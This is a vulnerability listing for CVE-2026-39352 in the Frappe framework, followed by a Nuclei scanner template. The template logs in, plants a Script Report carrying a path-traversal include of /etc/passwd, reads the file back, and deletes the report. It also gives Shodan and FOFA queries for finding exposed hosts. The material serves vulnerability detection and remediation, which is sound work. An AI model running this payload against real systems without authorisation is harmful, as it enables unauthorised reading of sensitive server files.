| Title | Published | Views | Family |
|---|---|---|---|
| CVE-2026-39352 | 20 May 2026 19:27 | – | attackerkb |
| CVE-2026-39352 | 25 May 2026 09:50 | – | circl |
| Frappe Path Traversal Vulnerability | 20 May 2026 00:00 | – | cnnvd |
| CVE-2026-39352 | 20 May 2026 19:27 | – | cve |
| CVE-2026-39352 Frappe has an Arbitrary File Read via Path Traversal in render_include | 20 May 2026 19:27 | – | cvelist |
| EUVD-2026-31178 | 20 May 2026 19:27 | – | euvd |
| CVE-2026-39352 | 20 May 2026 20:16 | – | nvd |
| PT-2026-42259 | 20 May 2026 00:00 | – | ptsecurity |
| CVE-2026-39352 | 21 May 2026 19:57 | – | redhatcve |
| CVE-2026-39352 Frappe has an Arbitrary File Read via Path Traversal in render_include | 20 May 2026 19:27 | – | vulnrichment |
```yaml
id: CVE-2026-39352

info:
  name: Frappe Framework < 16.15.0 - Arbitrary File Read via render_include Path Traversal
  author: DhiyaneshDK
  severity: medium
  description: |
    Frappe is a full-stack web application framework. Versions prior to 15.105.0 and 16.15.0 contain a possible Arbitrary File Read vulnerability via Path Traversal. The issue is resolved in versions 16.15.0, 15.105.0 and above.
  impact: |
    Attackers can read arbitrary files, potentially exposing sensitive information.
  remediation: Update to version 15.105.0, 16.15.0 or later.
  reference:
    - https://github.com/frappe/frappe/security/advisories/GHSA-67rf-pxgh-vfqv
    - https://github.com/frappe/frappe/commit/b5ab941788f6232b4f9313432ea7bfb61389fbfd
    - https://github.com/frappe/frappe/pull/38215
    - https://nvd.nist.gov/vuln/detail/CVE-2026-39352
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 6.5
    cve-id: CVE-2026-39352
    epss-score: 0.01279
    epss-percentile: 0.66442
    cwe-id: CWE-22
  metadata:
    verified: true
    max-request: 4
    vendor: frappe
    product: frappe
    shodan-query: http.title:"Login" http.html:"frappe"
    fofa-query: title="Login" && body="frappe"
  tags: cve,cve2026,frappe,lfi,authenticated,file-read

# The four requests run in order; the template needs valid (low-privilege) credentials.
flow: http(1) && http(2) && http(3) && http(4)

variables:
  username: "{{username}}"
  password: "{{password}}"

http:
  # 1. Authenticate; the session cookie is reused by the requests that follow.
  - raw:
      - |
        POST /api/method/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        usr={{username}}&pwd={{password}}

    matchers:
      - type: word
        part: body
        words:
          - "Logged In"
        internal: true

  # 2. Create a Script Report whose client script carries a traversing include path.
  - raw:
      - |
        POST /api/resource/Report HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"doctype":"Report","report_name":"nuclei_cve2026_39352_{{randstr}}","report_type":"Script Report","ref_doctype":"User","is_standard":"No","disabled":0,"javascript":"{% include 'frappe/../../../../../../../../../../etc/passwd' %}"}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "nuclei_cve2026_39352")'
        condition: and
        internal: true

  # 3. Fetch the rendered script; on a vulnerable host the response includes the file contents.
  - raw:
      - |
        GET /api/method/frappe.desk.query_report.get_script?report_name=nuclei_cve2026_39352_{{randstr}} HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - regex('root:.*:0:0:', body)
          - contains(content_type, "application/json")
          - status_code == 200
        condition: and

  # 4. Clean up: delete the report created in step 2.
  - raw:
      - |
        DELETE /api/resource/Report/nuclei_cve2026_39352_{{randstr}} HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - contains_all(body, "data","ok")
          - contains(content_type, "application/json")
          - status_code == 202
        condition: and
        internal: true
# digest: 4b0a00483046022100f9320cc5b8353a62c88aacf6207893ec8f7d39f4f6874449cc1701911acbe078022100e8235df5c9074a046040bdba6507f2433852ed646858980110f0cc32fe07d7ec:922c64590222798bb761d5b6d8e72950
```